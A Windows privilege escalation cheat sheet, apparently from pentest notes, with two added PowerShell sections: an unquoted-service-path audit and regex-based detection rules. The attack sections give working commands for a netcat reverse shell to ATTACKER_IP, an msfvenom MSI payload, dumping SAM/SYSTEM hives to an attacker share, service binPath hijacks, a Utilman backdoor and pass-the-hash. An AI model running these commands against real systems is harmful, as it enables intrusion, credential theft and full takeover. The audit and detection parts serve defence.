# Windows Privilege Escalation

## Links

* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)

## Account Types

* __Administrator__, local & domain
* __Standard__, local & domain
* __Guest__
* __System__, local system, final escalation target
* __Local Service__, appears as an anonymous connection over the network
* __Network Service__, default service account, authenticates over the network

## Enumeration

### Users & Groups

```sh
whoami /priv
net users
net localgroup
query session
qwinsta
```

### Files

* [powershell](../../../../enumeration/windows/powershell.md)

### System

```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

* Installed software

```sh
wmic product get name,version,vendor
```

* Services

```sh
wmic service list brief | findstr "Running"
```

## Exploit

### DLL Hijacking

* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path

* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)

### Token Impersonation

* `SeImpersonatePrivilege` is required, check via `whoami /priv`
* Hot Potato works best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)

### Scheduled Tasks

* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
* `Autoruns64.exe`

### MSI Elevated Installer

* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials

```sh
cmdkey /list
```

* Use found credentials

```sh
runas /savecred /user: reverse_shell.exe
```

* Registry keys containing passwords

```sh
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### accesschk64 Permissions

* Check access to files and folders

```sh
accesschk64 -wvu "file.exe"
```

* If permission `SERVICE_CHANGE_CONFIG` is set

```sh
sc config binPath= "net localgroup administrators user /add"
```

* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from `service_escalation` onto the binary path and restart the service afterwards.

#### accesschk64 for Services

```sh
accesschk64 -qlc "service.exe"
```

* If permission `SERVICE_ALL_ACCESS` is set, the service is configurable; upload a reverse shell

```sh
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
```

* Reconfigure and restart the service

```sh
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
```

### Startup Application

* Put a reverse shell in place of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`

### Password Mining

* Set up metasploit

```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```

* Visit the site on the target

### Unattended Windows Installation

* Investigate the following paths to potentially find user credentials

```sh
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

* Watch out for the `` tags

### PowerShell History File

```sh
# Get-Content is a PowerShell cmdlet, so %userprofile% does not expand here; use $env:USERPROFILE
Get-Content $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

### Internet Information Services (IIS)

* Default web server on Windows
* Paths containing credentials are the following

```sh
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

### PuTTY

* Saved proxy password credentials may be found via

```sh
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
```

### schtasks and icacls

* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
* Check the script run by the scheduled task; `F` in the `icacls` output means full access

```sh
icacls
```

* Put the payload inside the script

```sh
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" >
```

* Run the task

```sh
schtasks /run /tn %TASK_NAME%
```

### Always Install Elevated

* `AlwaysInstallElevated` has to be set to `1` in both of these keys

```sh
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

* Craft a `*.msi` file with a payload

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
```

* Upload and execute via

```sh
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
```

### Service Misconfiguration

* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`

```sh
sc qc apphostsvc
```

* Check the permissions on the binary found via

```sh
icacls
```

* If the service binary path is writable, move the payload to that path and grant permissions

```sh
icacls /grant Everyone:F
```

```sh
sc stop
sc start
```

* Catch the reverse shell

Other ways are:

* The Discretionary Access Control List (DACL) can be opened via right click on the service and going to properties
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`

### Unquoted Service Path

* If `BINARY_PATH_NAME` contains spaces and is not quoted, the path is resolved at every space from left to right. If a binary with a matching name exists in one of those directories, it is started instead of the real service binary.
* A directory created at install time inherits the permissions from its parent. Check it via

```sh
icacls
```

* Generate a `service-exe` payload in msfvenom, upload it and place it on the path under the partial name that the unquoted service path resolves to
* Set permissions

```sh
icacls C:\Path\to\service.exe /grant Everyone:F
```

### Permissions

* [priv2admin](https://github.com/gtworek/Priv2Admin)
* `whoami /priv`

#### SeBackup / SeRestore

* If `SeBackupPrivilege` / `SeRestorePrivilege` (read/write on all files) is set, an elevated `cmd.exe` may be opened
* Save the `SAM` and `SYSTEM` hives

```sh
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam C:\Windows\Temp\sam.hive
```

* Start an SMB server on the attack machine and copy the hives to it

```sh
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
```

* Dump the hashes

```sh
secretsdump.py -sam sam.hive -system system.hive LOCAL
```

* Use pass-the-hash to log in

```sh
psexec.py -hashes administrator@$TARGET_IP
```

#### SeTakeOwnership

* If `SeTakeOwnershipPrivilege` is set, ownership of any file or service can be taken

```sh
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant :F
copy cmd.exe utilman.exe
```

* Log out, then on the login screen click on `Ease of Access`

#### SeImpersonate / SeAssignPrimaryToken

* Execute a process as another user
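## Audit

The unquoted service path and service misconfiguration sections above describe how the service control manager resolves an unquoted `BINARY_PATH_NAME` prefix by prefix. The following PowerShell script is an added audit example written for these notes, not part of the original page or of any tool linked here; the low-privilege principal list and the write-bit mask are heuristics assumed for the example, and the `Fix` column shows the `sc config` command that quotes the path.

```powershell
# Added audit script (not from the original notes): for each service with an unquoted
# binary path containing spaces, list the files the service control manager would try
# before the real binary and whether a low-privileged principal can create files there.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# CreateFiles/WriteData (0x2) plus GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000)
$WriteMask = 0x2 -bor 0x40000000 -bor 0x10000000
function Split-ServicePath {
    param([string]$PathName)
    # Quoted paths resolve as written; only unquoted paths with spaces are ambiguous.
    if (-not $PathName -or $PathName.StartsWith('"')) { return $null }
    $idx = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($idx -lt 0) { return $null }
    $exe = $PathName.Substring(0, $idx + 4)
    if ($exe -notmatch ' ') { return $null }
    # Every prefix that ends at a space is tried first, with ".exe" appended.
    $candidates = foreach ($i in 0..($exe.Length - 1)) {
        if ($exe[$i] -eq ' ') { $exe.Substring(0, $i) + '.exe' }
    }
    [pscustomobject]@{ Exe = $exe; Args = $PathName.Substring($exe.Length); Candidates = @($candidates) }
}
function Test-LowPrivWritable {
    param([string]$Directory)
    # Returns the first low-privileged principal holding a write-capable Allow ACE, else $null.
    if (-not (Test-Path -LiteralPath $Directory)) { return $null }
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # InheritOnly (2) ACEs do not apply to the directory itself (e.g. Modify on the C:\ root).
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}
Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $parts = Split-ServicePath $svc.PathName
    if (-not $parts) { return }
    foreach ($cand in $parts.Candidates) {
        [pscustomobject]@{
            Service    = $svc.Name
            RunsAs     = $svc.StartName
            Candidate  = $cand
            WritableBy = Test-LowPrivWritable (Split-Path -Parent $cand)
            # Remediation: quote the executable so only the real binary is resolved.
            Fix        = "sc.exe config $($svc.Name) binPath= `"\`"$($parts.Exe)\`"$($parts.Args)`""
        }
    }
} | Sort-Object WritableBy -Descending | Format-Table -AutoSize -Wrap
```

Rows with a non-empty `WritableBy` are the ones where a standard user could plant a binary; rows without it are still misconfigured and should get the `Fix` applied.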
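## Detection

Most techniques in these notes leave a distinctive process command line (`reg save hklm\sam`, `sc config ... binPath=`, `msiexec /qn /i`, `takeown /f ... Utilman.exe`). The script below is an added detection example for these notes, not code from the original page; the rule names are assumptions, the sample command lines are constructed to mirror the commands above, and the live variant assumes command-line auditing is enabled for Security event 4688.

```powershell
# Added detection example (not from the original notes): maps the commands used in this
# cheat sheet to regexes and applies them to process-creation command lines.
$Rules = [ordered]@{
    'Hive save for SeBackup abuse'     = 'reg(\.exe)?\s+save\s+hklm\\(sam|system|security)'
    'Service binPath reconfiguration'  = '\bsc(\.exe)?\s+config\s+\S+\s+binpath='
    'Quiet MSI install'                = 'msiexec(\.exe)?(?=.*\s/(quiet|qn)\b).*\s/i\s'
    'Utilman replacement via takeown'  = 'takeown(\.exe)?\s+/f\s+.*utilman\.exe'
    'Password search in registry'      = 'reg(\.exe)?\s+query\s+hk\w+\s+/f\s+password'
    'Saved credential enumeration'     = 'cmdkey(\.exe)?\s+/list'
    'Manual scheduled task run'        = 'schtasks(\.exe)?\s+/run\s+/tn'
}
function Test-PrivescCommandLine {
    param([string]$CommandLine)
    # Returns the name of the first matching rule, or $null for a benign line.
    foreach ($name in $Rules.Keys) {
        if ($CommandLine -match $Rules[$name]) { return $name }
    }
    return $null
}
# Constructed sample command lines mirroring the notes above, so the rules can be checked offline.
$Samples = @(
    'reg  save hklm\sam C:\Windows\Temp\sam.hive',
    'sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem',
    'msiexec /i C:\Windows\Temp\wizard.msi /qn',
    'takeown /f C:\Windows\System32\Utilman.exe',
    'reg query HKLM /f password /t REG_SZ /s',
    'whoami /priv'   # benign: no rule should fire
)
foreach ($s in $Samples) {
    [pscustomobject]@{ Rule = Test-PrivescCommandLine $s; CommandLine = $s }
}
# Live variant: needs "Include command line in process creation events" enabled for 4688.
function Get-PrivescProcessEvent {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $cl = ($xml.Event.EventData.Data | Where-Object Name -eq 'CommandLine').'#text'
            $rule = Test-PrivescCommandLine $cl
            if ($rule) { [pscustomobject]@{ Time = $_.TimeCreated; Rule = $rule; CommandLine = $cl } }
        }
}
```

The same regexes can be applied to Sysmon event 1 `CommandLine` fields; the `whoami /priv` sample is expected to return no rule.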